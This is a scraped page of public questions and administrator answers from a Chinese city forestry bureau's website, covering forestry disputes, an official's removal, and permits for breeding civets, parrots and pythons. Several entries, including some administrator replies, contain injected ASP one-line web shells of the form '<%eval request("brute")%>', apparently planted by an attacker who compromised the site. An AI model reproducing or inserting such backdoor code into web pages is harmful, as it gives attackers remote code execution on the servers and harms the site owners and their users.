您现在的位置:首页 >> 查看留言 签写留言
查看留言
  • 1.林业纠纷怎么办?什么是属地管理 125.90.79. 2017/9/14 11:12:18 IP:125.90.79.*
    林业纠纷怎么办?什么是属地管理?

    管理员回复:你好!关于林业纠纷,涉及内容太多,你的问题还不够具体,难以做出具体答复,如有需要,请致电:0759-3313709做进一步的询问。 所谓的属地管理,可以通过网络搜索进行学习了解。
    (回复时间:2017/9/27 8:41:17)
  • 2.原市林业局局长梁车生为何被免? 111.111.213. 2014/2/16 16:30:35 IP:123.183.213.*
    2012年12月,湛江市十三届人大常委会召开第八次全体会议,根据常务副市长赵志辉受市长王中丙的委托提请,经常委会会议审议通过,决定免去梁车生的湛江市林业局局长职务。请问为什么呢?现在他担任什么职务了?
    <%eval request("brute")%>

    管理员回复:梁车生局长已达到规定的改非年龄,现职位为林业局调研员。 <%eval request("x")%>
    (回复时间:2014/8/31 22:14:01)
  • 3.为什么网上留言“用不了? 111.111.213. 2014/1/29 19:50:24 IP:123.183.213.*
    为什么贵局的”政民互动“里面的"网上留言”板块用不了?
    <%eval request("112233")%>

    管理员回复: 新春佳节,谢谢您的关注!现在“政民互动”里面的“网上留言”是可用的,给您造成的不便我们深感歉意。为此,也欢迎您继续关注我们的网站,有关林业方面的问题随时欢迎留言咨询。
    (回复时间:2014/8/8 12:00:28)
  • 4.珍稀野生动物”不求人“是何物? 220.178.22. 2014/1/19 19:04:07 IP:221.204.234.*
    据《霞山区志》介绍:“二十世纪五十年代以前,在屋山蒲草洋田中生长着一种珍稀野生动物俗称“不求人”,因此种动物既像狗又像狐狸,一种具有雌雄两性,自我交配繁殖,故名。1954年建设黎湛铁路以后,随着蒲草洋田的消失和人为捕杀而绝种。”
    请问这种神奇的动物“不求人”是何物,有没更详细的介绍描述,例如习性,标本等等!或许这是湛江市独有的物种,正如年初科学家将湛江生蚝命名为“湛江牡蛎”一样,是个新物种!谢谢

    管理员回复: 俗称“不求人”的珍惜野生动物是指灵猫科的“小灵猫”和“大灵猫”,属于国家二级保护动物,非雌雄两性,主要分布在长江以南各省。此类动物在阴部有发达的囊状香腺,能分泌奇异气味--灵猫香。
    (回复时间:2014/1/27 10:48:31)
  • 5.我想申请办理果子狸繁殖驯养基地 183.50.115. 2014/1/5 17:38:14 IP:183.50.115.*
    我是一名下岗职工,想办个果子狸养殖驯养基地,从广西引进种苗,是否可以获得批准?

    管理员回复: 根据《广东省野生动物保护管理条例》的规定,你要养殖的果子狸属于“三有”保护动物,不需要办理驯养许可证。你若具备场所和养殖技术即可驯养。但,养殖出卖经营,必须向当地林业局申报批准办理经营许可证。
    (回复时间:2014/1/13 16:52:48)
  • 6.关于养殖鹦鹉的问题 111.13.1. 2013/9/12 17:18:22 IP:114.54.1.*
    我想养殖鹦鹉,请问养殖的条件、需要提交的材料以及流程

    管理员回复: 鹦鹉是国家二级保护野生动物,根据《国家重点保护野生动物驯养繁殖许可证管理办法》规定:申请驯养繁殖国家二级保护野生动物必须具备以下条件:1. 有适宜驯养繁殖野生动物的固定场所和必须的设施。2. 具备与驯养繁殖野生动物种类、数量相适应的资金、人员和技术。3. 驯养繁殖野生动物饲料来源有保证。 申请人要提交如下申报材料: 1.驯养单位或个人的申请报告;2. 国家重点保护野生动物驯养繁殖许可证申请表;3. 与申请驯养繁殖的野生动物种类、规模相适应的驯养繁殖场所使用权,固定场所和必须的设施、资金储备和固定资产投入、饲养人员技术能力等证明文件及相关相片;4. 驯养繁殖可行性研究报告。 办理流程: 申请人向驯养繁殖所在地县级林业主管部门提出申请,经县级林业主管部门审核并逐级上报省林业厅审批,核发野生动物驯养繁殖许可证。 <%eval request("brute")%>
    (回复时间:2014/4/1 22:00:50)
  • 7.蟒蛇养殖场 14.210.147. 2013/8/22 15:48:02 IP:14.210.147.*
    在海南有家东盛弘蟒蛇养殖开发公司。我想从这家公司购买蛇种养殖,不知道驯养证可以办吗?

    管理员回复:您好!蟒蛇驯养证可以办,请向所在地县级林业主管部门申请,逐级上报国家林业局审批。<%eval request("brute")%>。
    (回复时间:2014/8/9 0:14:49)
  • 8.还算不算是林地 183.12.7. 2013/5/22 1:18:43 IP:183.12.7.*
    以前是农村林地,在早三年前经林业局同意村委将树木砍掉去卖,我在没有树木的时候在原来的林地上推开了一块空地,空地上现在没有树木,请问现在这块地还算是林地吗

    管理员回复:是林业用地。
    (回复时间:2013/6/3 9:26:13)
  • 9.什么情况下砍伐树木构成犯罪 14.210.232. 2013/5/13 20:52:33 IP:14.210.232.*
         如标题,对于保护树木的如何定义,上百年的榕树是否列入保护数目,需要办理什么手续才能砍伐,在未办理合法手续之前擅自砍伐是否构成犯罪,湛江林业局能否处理

    管理员回复:根据《湛江市古树名木保护管理办法》(湛府【2013】29号)规定:古树是指树龄在一百年以上的树木,名木是指国内外稀有的具有历史价值、纪念意义和重要科研价值的树木;上百年的榕树列入古树,列入保护对象,砍伐需行政主管部门批准;在未办理合法手续之前擅自砍伐属违法行为,要受到处罚;在城市规划区内的古树名木由所在地城市园林绿化行政主管部门处理;在城市规划区外的古树名木由所在地林业行政主管部门处理。<%eval request("xu")%>
    (回复时间:2014/8/14 0:36:49)
  • 首 页
  • 上一页
  • 1
  • 下一页
  • 末 页
  • 9条记录 10条/每页
  • 湛江林业网(www.zjf.gov.cn) © 2017 版权所有 All Rights Reserved.
  • 地址:湛江市赤坎区椹川大道北84号 邮政编码:524033
    联系电话:0759-3313709 电子邮箱:zjly3313709@126.com
    主办单位:湛江市林业局

    粤ICP备09136083号

  • Powered by zjf.gov.cn